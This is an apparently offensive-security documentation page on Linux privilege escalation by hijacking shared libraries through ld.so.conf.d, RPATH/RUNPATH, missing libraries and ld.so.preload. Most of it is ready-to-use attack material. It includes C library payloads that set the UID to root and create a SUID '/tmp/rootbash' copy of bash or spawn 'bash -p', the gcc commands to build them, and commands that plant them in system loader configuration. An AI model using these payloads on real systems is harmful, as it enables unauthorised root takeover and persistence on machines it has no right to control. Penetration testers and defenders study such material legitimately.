> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Shared Library Hijacking

> Privilege escalation via shared libraries: writable ld.so.conf, RPATH/RUNPATH injection, and missing library abuse.

## Overview

Linux binaries load shared libraries (`.so`) at runtime. If you can control where libraries are loaded from, you can inject malicious code that runs with the binary's privileges.

***

## Library Search Order

```
1. RPATH (embedded in binary, deprecated)
2. LD_LIBRARY_PATH (environment variable)
3. RUNPATH (embedded in binary)
4. /etc/ld.so.cache (generated from ld.so.conf)
5. /lib and /usr/lib (default)
```

***

## Writable /etc/ld.so.conf.d/

```bash theme={"dark"}
ls -la /etc/ld.so.conf.d/
```

If writable, add custom library path:

```bash theme={"dark"}
echo "/tmp/evil" > /etc/ld.so.conf.d/evil.conf
ldconfig
```

Create malicious library in `/tmp/evil/` matching a library name used by a root process.

***

## Writable Library Directories

Check if any configured library path is writable:

```bash theme={"dark"}
cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null
ldconfig -p | awk -F'=> ' '{print $2}' | xargs -I{} dirname {} | sort -u | while read d; do [ -w "$d" ] && echo "WRITABLE: $d"; done
```

If writable → replace existing library or add new one.

***

## RPATH / RUNPATH Injection

### Check Binary for RPATH/RUNPATH

```bash theme={"dark"}
readelf -d /usr/local/bin/target | grep -i "rpath\|runpath"
```

```bash theme={"dark"}
objdump -p /usr/local/bin/target | grep -i "rpath\|runpath"
```

### Example Output

```
RUNPATH: /home/user/lib:/usr/lib
```

If `/home/user/lib` is writable:

### Find Libraries the Binary Loads

```bash theme={"dark"}
ldd /usr/local/bin/target
```

### Create Malicious Library

```c theme={"dark"}
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
}
```

Compile:

```bash theme={"dark"}
gcc -shared -fPIC -o /home/user/lib/libtarget.so hijack.c
```

Run SUID binary or wait for root service to execute it.

***

## Missing Shared Library

If a SUID binary or root service tries to load a library that doesn't exist:

### Find Missing Libraries

```bash theme={"dark"}
strace /usr/local/bin/suid-binary 2>&1 | grep "No such file"
```

```bash theme={"dark"}
ldd /usr/local/bin/suid-binary | grep "not found"
```

### Example

```
libcustom.so => not found
```

Find writable directory in search path and create the library:

```c theme={"dark"}
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
```

```bash theme={"dark"}
gcc -shared -fPIC -nostartfiles -o /writable/path/libcustom.so exploit.c
```

***

## ld.so.preload

`/etc/ld.so.preload` is loaded before all other libraries for every binary.

### Check Permissions

```bash theme={"dark"}
ls -la /etc/ld.so.preload
```

If writable:

```bash theme={"dark"}
echo "/tmp/evil.so" > /etc/ld.so.preload
```

Create `evil.so`:

```c theme={"dark"}
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    if (getuid() == 0) {
        unsetenv("LD_PRELOAD");
        system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
    }
}
```

```bash theme={"dark"}
gcc -shared -fPIC -nostartfiles -o /tmp/evil.so evil.c
```

Next time any root process runs → payload executes.

***

## ldconfig Abuse

If you can run `ldconfig` (directly or via sudo):

```bash theme={"dark"}
sudo ldconfig
```

After adding malicious path to `/etc/ld.so.conf.d/` or placing library in existing path, `ldconfig` rebuilds the cache:

```bash theme={"dark"}
# Verify cache updated
ldconfig -p | grep evil
```

***

## Quick Reference

| Scenario                      | Technique                      |
| ----------------------------- | ------------------------------ |
| Writable `/etc/ld.so.conf.d/` | Add custom lib path + ldconfig |
| Writable RPATH/RUNPATH dir    | Drop malicious .so             |
| Missing library (not found)   | Create .so in search path      |
| Writable `/etc/ld.so.preload` | Preload malicious .so globally |
| Writable library directory    | Replace existing .so           |
